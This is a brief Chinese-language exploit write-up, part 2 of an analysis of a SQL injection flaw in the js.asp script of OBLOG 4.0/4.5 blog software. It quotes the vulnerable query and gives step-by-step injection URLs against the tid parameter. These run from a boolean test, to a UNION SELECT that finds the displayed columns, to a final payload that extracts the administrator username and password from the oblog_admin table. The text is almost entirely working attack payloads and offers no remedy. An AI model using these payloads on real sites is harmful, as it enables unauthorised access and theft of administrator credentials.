OBLOG4.0 OBLOG4.5漏洞利用分析(2)
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 查询语句 and (1=1
Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1
document.write('
*
‘);
gid=1跟pid=2里的1,2就是了 直接替换里面的1,2为username,password
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1
内容版权声明:除非注明,否则皆为本站原创文章。